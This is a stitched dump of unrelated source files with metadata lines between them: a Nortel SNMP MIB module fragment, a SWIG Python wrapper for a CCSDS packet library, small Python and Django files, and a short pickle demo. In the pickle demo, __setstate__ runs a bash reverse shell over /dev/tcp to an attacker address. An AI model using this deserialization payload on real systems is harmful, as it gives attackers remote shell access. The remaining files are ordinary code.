Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 200))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setStatus('mandatory') mscColSpStateTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11), ) if mibBuilder.loadTexts: mscColSpStateTable.setStatus('mandatory') mscColSpStateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpStateEntry.setStatus('mandatory') mscColSpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("locked", 0), ("unlocked", 1), ("shuttingDown", 2))).clone('unlocked')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAdminState.setStatus('mandatory') mscColSpOperationalState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disabled", 0), ("enabled", 1))).clone('disabled')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpOperationalState.setStatus('mandatory') mscColSpUsageState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("idle", 0), ("active", 1), ("busy", 2))).clone('idle')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpUsageState.setStatus('mandatory') mscColSpAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setStatus('mandatory') mscColSpProceduralStatus = 
MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpProceduralStatus.setStatus('mandatory') mscColSpControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpControlStatus.setStatus('mandatory') mscColSpAlarmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAlarmStatus.setStatus('mandatory') mscColSpStandbyStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 15))).clone(namedValues=NamedValues(("hotStandby", 0), ("coldStandby", 1), ("providingService", 2), ("notSet", 15))).clone('notSet')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpStandbyStatus.setStatus('mandatory') mscColSpUnknownStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("false", 0), ("true", 1))).clone('false')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpUnknownStatus.setStatus('mandatory') mscColSpOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12), ) if mibBuilder.loadTexts: mscColSpOperTable.setStatus('mandatory') mscColSpOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpOperEntry.setStatus('mandatory') mscColSpSpoolingFileName = 
MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1, 1), AsciiString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpSpoolingFileName.setStatus('mandatory') mscColSpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13), ) if mibBuilder.loadTexts: mscColSpStatsTable.setStatus('mandatory') mscColSpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpStatsEntry.setStatus('mandatory') mscColSpCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setStatus('mandatory') mscColSpRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRecordsRx.setStatus('mandatory') mscColSpRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setStatus('mandatory') mscColAg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3)) mscColAgRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1), ) if mibBuilder.loadTexts: mscColAgRowStatusTable.setStatus('mandatory') mscColAgRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgRowStatusEntry.setStatus('mandatory') mscColAgRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 1), RowStatus()).setMaxAccess("readonly") if 
mibBuilder.loadTexts: mscColAgRowStatus.setStatus('mandatory') mscColAgComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgComponentName.setStatus('mandatory') mscColAgStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgStorageType.setStatus('mandatory') mscColAgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))) if mibBuilder.loadTexts: mscColAgIndex.setStatus('mandatory') mscColAgStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10), ) if mibBuilder.loadTexts: mscColAgStatsTable.setStatus('mandatory') mscColAgStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgStatsEntry.setStatus('mandatory') mscColAgCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setStatus('mandatory') mscColAgRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsRx.setStatus('mandatory') mscColAgRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setStatus('mandatory') mscColAgAgentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11), ) if mibBuilder.loadTexts: mscColAgAgentStatsTable.setStatus('mandatory') mscColAgAgentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 
1, 21, 3, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex")) if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setStatus('mandatory') mscColAgRecordsNotGenerated = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1, 1), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setStatus('mandatory') dataCollectionGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1)) dataCollectionGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1)) dataCollectionGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3)) dataCollectionGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3, 2)) dataCollectionCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3)) dataCollectionCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1)) dataCollectionCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3)) dataCollectionCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3, 2)) mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-DataCollectionMIB", mscColProvEntry=mscColProvEntry, mscColSpUsageState=mscColSpUsageState, mscColAgRowStatus=mscColAgRowStatus, mscColIndex=mscColIndex, mscColSpProvEntry=mscColSpProvEntry, mscColSpStandbyStatus=mscColSpStandbyStatus, mscColAgComponentName=mscColAgComponentName, mscColCurrentQueueSize=mscColCurrentQueueSize, mscColAgCurrentQueueSize=mscColAgCurrentQueueSize, mscColStatsEntry=mscColStatsEntry, mscColStatsTable=mscColStatsTable, mscColSpSpoolingFileName=mscColSpSpoolingFileName, mscColAgStorageType=mscColAgStorageType, mscColAgRecordsRx=mscColAgRecordsRx, mscColPeakTable=mscColPeakTable, mscColSpRecordsDiscarded=mscColSpRecordsDiscarded, mscColSpControlStatus=mscColSpControlStatus, dataCollectionGroupCA02=dataCollectionGroupCA02, 
dataCollectionCapabilitiesCA02A=dataCollectionCapabilitiesCA02A, mscColAgAgentStatsEntry=mscColAgAgentStatsEntry, mscColSpOperTable=mscColSpOperTable, mscColSpOperationalState=mscColSpOperationalState, mscColAgRowStatusTable=mscColAgRowStatusTable, dataCollectionMIB=dataCollectionMIB, mscColAgRowStatusEntry=mscColAgRowStatusEntry, mscColAgRecordsDiscarded=mscColAgRecordsDiscarded, mscColSpAdminState=mscColSpAdminState, mscColAgStatsTable=mscColAgStatsTable, mscColSpAlarmStatus=mscColSpAlarmStatus, mscColTimesValue=mscColTimesValue, mscColAgAgentStatsTable=mscColAgAgentStatsTable, mscColTimesRowStatus=mscColTimesRowStatus, mscColTimesTable=mscColTimesTable, mscColAgIndex=mscColAgIndex, mscColLastEntry=mscColLastEntry, mscColPeakValue=mscColPeakValue, dataCollectionGroupCA=dataCollectionGroupCA, mscColSpSpooling=mscColSpSpooling, dataCollectionCapabilitiesCA02=dataCollectionCapabilitiesCA02, mscColSpMaximumNumberOfFiles=mscColSpMaximumNumberOfFiles, mscColSpProvTable=mscColSpProvTable, mscColSpAvailabilityStatus=mscColSpAvailabilityStatus, mscColSpCurrentQueueSize=mscColSpCurrentQueueSize, mscColSpStorageType=mscColSpStorageType, dataCollectionGroupCA02A=dataCollectionGroupCA02A, mscColAg=mscColAg, mscColSpUnknownStatus=mscColSpUnknownStatus, mscColAgStatsEntry=mscColAgStatsEntry, dataCollectionGroup=dataCollectionGroup, mscCol=mscCol, mscColSpOperEntry=mscColSpOperEntry, mscColSpRowStatusEntry=mscColSpRowStatusEntry, mscColSpStateEntry=mscColSpStateEntry, mscColAgRecordsNotGenerated=mscColAgRecordsNotGenerated, mscColSpStateTable=mscColSpStateTable, mscColSpRecordsRx=mscColSpRecordsRx, mscColSpRowStatusTable=mscColSpRowStatusTable, mscColSpComponentName=mscColSpComponentName, mscColSpProceduralStatus=mscColSpProceduralStatus, mscColRowStatusTable=mscColRowStatusTable, mscColPeakEntry=mscColPeakEntry, mscColLastValue=mscColLastValue, mscColRowStatusEntry=mscColRowStatusEntry, mscColAgentQueueSize=mscColAgentQueueSize, mscColLastTable=mscColLastTable, 
mscColRowStatus=mscColRowStatus, mscColTimesEntry=mscColTimesEntry, mscColSp=mscColSp, mscColPeakRowStatus=mscColPeakRowStatus, mscColStorageType=mscColStorageType, dataCollectionCapabilitiesCA=dataCollectionCapabilitiesCA, mscColSpRowStatus=mscColSpRowStatus, mscColComponentName=mscColComponentName, mscColSpIndex=mscColSpIndex, mscColRecordsRx=mscColRecordsRx, mscColSpStatsTable=mscColSpStatsTable, mscColProvTable=mscColProvTable, mscColSpStatsEntry=mscColSpStatsEntry, dataCollectionCapabilities=dataCollectionCapabilities, mscColRecordsDiscarded=mscColRecordsDiscarded)
134.987952
3,370
0.763433
2,525
22,408
6.77505
0.092673
0.010288
0.014029
0.018706
0.460864
0.404571
0.392939
0.384989
0.353189
0.32817
0
0.087376
0.084747
22,408
165
3,371
135.806061
0.746745
0.017226
0
0
0
0
0.151183
0.064416
0
0
0
0
0
1
0
false
0.113924
0.056962
0
0.056962
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
f76361fcf068ba8c5aaf77e930edcf6ab7b3c971
8,423
py
Python
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
1
2021-06-10T13:14:27.000Z
2021-06-10T13:14:27.000Z
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
null
null
null
python/ccsdslib.py
nhaflinger/CCSDSlib
23bd332078c6c8a1a3e70bacdb9a81f0da9403a3
[ "MIT" ]
null
null
null
# This file was automatically generated by SWIG (http://www.swig.org). # Version 4.0.2 # # Do not make changes to this file unless you know what you are doing--modify # the SWIG interface file instead. from sys import version_info as _swig_python_version_info if _swig_python_version_info < (2, 7, 0): raise RuntimeError("Python 2.7 or later required") # Import the low-level C/C++ module if __package__ or "." in __name__: from . import _ccsdslib else: import _ccsdslib try: import builtins as __builtin__ except ImportError: import __builtin__ def _swig_repr(self): try: strthis = "proxy of " + self.this.__repr__() except __builtin__.Exception: strthis = "" return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,) def _swig_setattr_nondynamic_instance_variable(set): def set_instance_attr(self, name, value): if name == "thisown": self.this.own(value) elif name == "this": set(self, name, value) elif hasattr(self, name) and isinstance(getattr(type(self), name), property): set(self, name, value) else: raise AttributeError("You cannot add instance attributes to %s" % self) return set_instance_attr def _swig_setattr_nondynamic_class_variable(set): def set_class_attr(cls, name, value): if hasattr(cls, name) and not isinstance(getattr(cls, name), property): set(cls, name, value) else: raise AttributeError("You cannot add class attributes to %s" % cls) return set_class_attr def _swig_add_metaclass(metaclass): """Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass""" def wrapper(cls): return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy()) return wrapper class _SwigNonDynamicMeta(type): """Meta class to enforce nondynamic attributes (no new attributes) for a class""" __setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__) class SwigPyIterator(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") def __init__(self, 
*args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr __swig_destroy__ = _ccsdslib.delete_SwigPyIterator def value(self): return _ccsdslib.SwigPyIterator_value(self) def incr(self, n=1): return _ccsdslib.SwigPyIterator_incr(self, n) def decr(self, n=1): return _ccsdslib.SwigPyIterator_decr(self, n) def distance(self, x): return _ccsdslib.SwigPyIterator_distance(self, x) def equal(self, x): return _ccsdslib.SwigPyIterator_equal(self, x) def copy(self): return _ccsdslib.SwigPyIterator_copy(self) def next(self): return _ccsdslib.SwigPyIterator_next(self) def __next__(self): return _ccsdslib.SwigPyIterator___next__(self) def previous(self): return _ccsdslib.SwigPyIterator_previous(self) def advance(self, n): return _ccsdslib.SwigPyIterator_advance(self, n) def __eq__(self, x): return _ccsdslib.SwigPyIterator___eq__(self, x) def __ne__(self, x): return _ccsdslib.SwigPyIterator___ne__(self, x) def __iadd__(self, n): return _ccsdslib.SwigPyIterator___iadd__(self, n) def __isub__(self, n): return _ccsdslib.SwigPyIterator___isub__(self, n) def __add__(self, n): return _ccsdslib.SwigPyIterator___add__(self, n) def __sub__(self, *args): return _ccsdslib.SwigPyIterator___sub__(self, *args) def __iter__(self): return self # Register SwigPyIterator in _ccsdslib: _ccsdslib.SwigPyIterator_swigregister(SwigPyIterator) class CCSDSprimaryHeader(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr packet_version = property(_ccsdslib.CCSDSprimaryHeader_packet_version_get, _ccsdslib.CCSDSprimaryHeader_packet_version_set) packet_type = property(_ccsdslib.CCSDSprimaryHeader_packet_type_get, _ccsdslib.CCSDSprimaryHeader_packet_type_set) sec_hdr_flag = property(_ccsdslib.CCSDSprimaryHeader_sec_hdr_flag_get, _ccsdslib.CCSDSprimaryHeader_sec_hdr_flag_set) apid = property(_ccsdslib.CCSDSprimaryHeader_apid_get, _ccsdslib.CCSDSprimaryHeader_apid_set) seq_flags = 
property(_ccsdslib.CCSDSprimaryHeader_seq_flags_get, _ccsdslib.CCSDSprimaryHeader_seq_flags_set) packet_count_or_name = property(_ccsdslib.CCSDSprimaryHeader_packet_count_or_name_get, _ccsdslib.CCSDSprimaryHeader_packet_count_or_name_set) packet_length = property(_ccsdslib.CCSDSprimaryHeader_packet_length_get, _ccsdslib.CCSDSprimaryHeader_packet_length_set) def __init__(self): _ccsdslib.CCSDSprimaryHeader_swiginit(self, _ccsdslib.new_CCSDSprimaryHeader()) __swig_destroy__ = _ccsdslib.delete_CCSDSprimaryHeader # Register CCSDSprimaryHeader in _ccsdslib: _ccsdslib.CCSDSprimaryHeader_swigregister(CCSDSprimaryHeader) class CCSDSsecondaryHeader(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr seconds = property(_ccsdslib.CCSDSsecondaryHeader_seconds_get, _ccsdslib.CCSDSsecondaryHeader_seconds_set) subseconds = property(_ccsdslib.CCSDSsecondaryHeader_subseconds_get, _ccsdslib.CCSDSsecondaryHeader_subseconds_set) def __init__(self): _ccsdslib.CCSDSsecondaryHeader_swiginit(self, _ccsdslib.new_CCSDSsecondaryHeader()) __swig_destroy__ = _ccsdslib.delete_CCSDSsecondaryHeader # Register CCSDSsecondaryHeader in _ccsdslib: _ccsdslib.CCSDSsecondaryHeader_swigregister(CCSDSsecondaryHeader) class ParamNameType(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr name = property(_ccsdslib.ParamNameType_name_get, _ccsdslib.ParamNameType_name_set) type = property(_ccsdslib.ParamNameType_type_get, _ccsdslib.ParamNameType_type_set) def __init__(self): _ccsdslib.ParamNameType_swiginit(self, _ccsdslib.new_ParamNameType()) __swig_destroy__ = _ccsdslib.delete_ParamNameType # Register ParamNameType in _ccsdslib: _ccsdslib.ParamNameType_swigregister(ParamNameType) class CCSDS(object): thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag") __repr__ = _swig_repr def __init__(self): 
_ccsdslib.CCSDS_swiginit(self, _ccsdslib.new_CCSDS()) __swig_destroy__ = _ccsdslib.delete_CCSDS def newPacketField(self, *args): return _ccsdslib.CCSDS_newPacketField(self, *args) def xmlPacketDesc(self, file_path, root_node): return _ccsdslib.CCSDS_xmlPacketDesc(self, file_path, root_node) def xtceAPID(self): return _ccsdslib.CCSDS_xtceAPID(self) def xtceSecHdrFlag(self): return _ccsdslib.CCSDS_xtceSecHdrFlag(self) def xtceVersion(self): return _ccsdslib.CCSDS_xtceVersion(self) def xtceType(self): return _ccsdslib.CCSDS_xtceType(self) def loadPacketFile(self, file_path): return _ccsdslib.CCSDS_loadPacketFile(self, file_path) def decodePacketBytes(self, file_bytes): return _ccsdslib.CCSDS_decodePacketBytes(self, file_bytes) def primaryHeader(self): return _ccsdslib.CCSDS_primaryHeader(self) def secondaryHeader(self): return _ccsdslib.CCSDS_secondaryHeader(self) def loadFrameFile(self, file_path): return _ccsdslib.CCSDS_loadFrameFile(self, file_path) def decodeFrameBytes(self, file_bytes): return _ccsdslib.CCSDS_decodeFrameBytes(self, file_bytes) def packetFields(self): return _ccsdslib.CCSDS_packetFields(self) def encodePacketBytes(self, *args): return _ccsdslib.CCSDS_encodePacketBytes(self, *args) def encodeCommand(self, command_header, command): return _ccsdslib.CCSDS_encodeCommand(self, command_header, command) # Register CCSDS in _ccsdslib: _ccsdslib.CCSDS_swigregister(CCSDS)
37.105727
146
0.721952
963
8,423
5.851506
0.182762
0.077019
0.079503
0.028571
0.274357
0.168234
0.106832
0.106832
0.091216
0.091216
0
0.001474
0.194586
8,423
226
147
37.269912
0.829157
0.071352
0
0.139073
1
0
0.036318
0
0
0
0
0
0
1
0.291391
false
0
0.039735
0.218543
0.794702
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
f7682b4c63a997f5f74b79056666b93d448ba6b7
100
py
Python
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
9
2020-04-23T05:24:19.000Z
2022-02-17T16:37:51.000Z
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
5
2020-10-01T05:08:37.000Z
2020-10-12T03:18:10.000Z
core-python/Core_Python/loop/PassLableDemo.py
theumang100/tutorials-1
497f54c2adb022c316530319a168fca1c007d4b1
[ "MIT" ]
9
2020-04-28T14:06:41.000Z
2021-10-19T18:32:28.000Z
for i in range(1,101) : if(i % 2 != 0): pass else: print(i,"is even number")
20
33
0.46
17
100
2.705882
0.882353
0
0
0
0
0
0
0
0
0
0
0.096774
0.38
100
5
33
20
0.645161
0
0
0
0
0
0.138614
0
0
0
0
0
0
1
0
false
0.2
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
f776538d6282674313ee6dc35b608e379b9e103d
462
py
Python
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
# SECURITY DEMO: pickle-deserialization remote-code-execution proof of concept.
# NEVER call pickle.loads on untrusted data -- unpickling invokes
# __setstate__ automatically, which here shells out to spawn a reverse shell.
import pickle
import os


class foobar:
    # Malicious picklable class: deserializing an instance executes a command.

    def __init__(self):
        pass

    def __getstate__(self):
        # State captured by pickle.dumps: the instance attribute dict
        # (empty here -- the payload lives entirely in __setstate__).
        return self.__dict__

    def __setstate__(self, state):
        # Runs automatically during pickle.loads -- this is the attack payload.
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        # NOTE(review): the IP inside the command string ("192.1681.10") is
        # missing a dot and does not match the comment above, so the payload
        # as written is malformed -- left byte-identical on purpose.
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"')


# Round-trip demonstration: dumps serializes the (empty) state, and loads
# triggers __setstate__, i.e. the command execution above.
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
22
83
0.621212
66
462
4.030303
0.606061
0.052632
0
0
0
0
0
0
0
0
0
0.08284
0.268398
462
20
84
23.1
0.704142
0.151515
0
0
0
0.083333
0.165312
0.067751
0
0
0
0
0
1
0.25
false
0.083333
0.166667
0.083333
0.583333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
3
f78d4902a0d45c5cc02a1d98f8f1c4923725a7d8
307
py
Python
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
1
2019-06-13T03:07:15.000Z
2019-06-13T03:07:15.000Z
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
8
2019-07-04T16:19:06.000Z
2019-07-12T17:37:51.000Z
FRCScouting/ContentPages/models.py
xNovax/FRCScouting.ca
caf2774e5854a7386eceb21e57b68c1f9c1f7d2d
[ "MIT" ]
null
null
null
from django.db import models


class GameManual(models.Model):
    """An uploaded game manual (file + cover image), identified by year."""

    # Four characters fits a calendar year, e.g. "2019".
    year = models.CharField(max_length=4)
    # Optional human-readable title.
    name = models.CharField(max_length=140, null=True)
    # The manual document itself, stored under MEDIA_ROOT/files/.
    file = models.FileField(upload_to='files/')
    # Cover/preview image, stored under MEDIA_ROOT/images/.
    image = models.ImageField(upload_to='images/')

    def __str__(self):
        # Display the manual by its year (stray C-style semicolon removed).
        return self.year
27.909091
53
0.70684
41
307
5.097561
0.707317
0.143541
0.172249
0.229665
0
0
0
0
0
0
0
0.015686
0.169381
307
10
54
30.7
0.803922
0
0
0
0
0
0.042345
0
0
0
0
0
0
1
0.125
false
0
0.125
0.125
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
3
f7a06fe51e0efd77d944743626803b8bcb3f2920
356
py
Python
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
14
2015-10-03T07:34:28.000Z
2021-09-20T07:10:29.000Z
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
23
2019-10-25T08:47:23.000Z
2022-01-30T02:00:45.000Z
manabi/apps/subscriptions/migrations/0019_refresh_all_receipts.py
aehlke/manabi
1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b
[ "MIT" ]
7
2016-10-04T08:10:36.000Z
2021-09-20T07:10:33.000Z
# Generated by Django 2.2.13 on 2021-04-05 01:30
from django.db import migrations
from django.conf import settings


def forwards(apps, schema_editor):
    """Forward data migration: intentionally a no-op."""
    pass


class Migration(migrations.Migration):
    """Follow-up to 0018; runs a no-op data migration, no schema changes."""

    dependencies = [
        ('subscriptions', '0018_add_itunes_receipt_field'),
    ]

    operations = [
        # Execute the (empty) forward step; irreversible as written since no
        # reverse function is supplied.
        migrations.RunPython(forwards),
    ]
17.8
59
0.69382
43
356
5.627907
0.790698
0.082645
0
0
0
0
0
0
0
0
0
0.071429
0.213483
356
19
60
18.736842
0.792857
0.129213
0
0
1
0
0.136364
0.094156
0
0
0
0
0
1
0.090909
false
0.090909
0.181818
0
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
3
e39124e26b71393012cab5f6f42ca8c04d6facf4
74
py
Python
employee_det/chalicelib/model/__init__.py
cadenababa/employee-details
f537dd797e20fa8aaf6bfe3bef20106dd8073ad1
